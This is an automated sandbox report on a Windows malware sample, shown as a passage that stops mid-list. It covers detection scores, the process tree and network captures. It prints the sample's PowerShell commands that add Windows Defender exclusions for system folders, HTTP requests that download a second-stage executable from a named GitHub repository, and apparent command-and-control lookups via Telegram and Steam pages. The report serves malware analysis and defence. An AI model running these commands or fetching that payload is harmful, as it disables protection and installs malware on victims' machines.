Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YYjRtxS70h.exe

Overview

General Information

Sample name:YYjRtxS70h.exe
renamed because original name is a hash value
Original sample name:5a59ce92b07de68c0be8fbd7944214e2.exe
Analysis ID:1579768
MD5:5a59ce92b07de68c0be8fbd7944214e2
SHA1:b0536d674552c3a11a881b154b668af1b5222641
SHA256:e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
Tags:exeuser-abuse_ch
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • YYjRtxS70h.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\YYjRtxS70h.exe" MD5: 5A59CE92B07DE68C0BE8FBD7944214E2)
    • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7556 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 8104 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 5308 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 7424, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", ProcessId: 7556, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 7424, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", ProcessId: 7556, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe", ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 7424, ParentProcessName: YYjRtxS70h.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'", ProcessId: 7556, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T09:01:51.144550+010020287653Unknown Traffic192.168.2.44980137.27.43.98443TCP
2024-12-23T09:02:27.809321+010020287653Unknown Traffic192.168.2.44988037.27.43.98443TCP
2024-12-23T09:03:04.237595+010020287653Unknown Traffic192.168.2.44996437.27.43.98443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeReversingLabs: Detection: 63%
Source: YYjRtxS70h.exeVirustotal: Detection: 62%Perma Link
Source: YYjRtxS70h.exeReversingLabs: Detection: 65%
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeJoe Sandbox ML: detected
Source: YYjRtxS70h.exeJoe Sandbox ML: detected
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041FC3B CryptStringToBinaryA,CryptStringToBinaryA,15_2_0041FC3B
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49958 version: TLS 1.2
Source: YYjRtxS70h.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041E359 FindFirstFileA,FindFirstFileA,15_2_0041E359
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00420370 FindFirstFileA,FindFirstFileA,15_2_00420370
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042498B FindFirstFileA,FindFirstFileA,15_2_0042498B
Source: C:\Users\user\Desktop\YYjRtxS70h.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_02AD2309
Source: global trafficHTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49801 -> 37.27.43.98:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49880 -> 37.27.43.98:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49964 -> 37.27.43.98:443
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownTCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00418024 InternetReadFile,15_2_00418024
Source: global trafficHTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: global trafficHTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cacheCookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.co! equals www.youtube.com (Youtube)
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.co!!Y< equals www.youtube.com (Youtube)
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: t.me
Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 0000000E.00000002.2326236200.0000000002C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000009.00000002.2185543036.0000000002F9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microhb
Source: powershell.exe, 00000004.00000002.2028077606.0000000007DC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
Source: powershell.exe, 0000000B.00000002.2153183743.00000000033E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic&ZX
Source: powershell.exe, 00000004.00000002.2023765180.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2172468220.000000000626C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000004.00000002.2021300435.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005356000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.00000000051A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2031133778.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2021300435.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2021300435.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005356000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.00000000051A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.st
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, 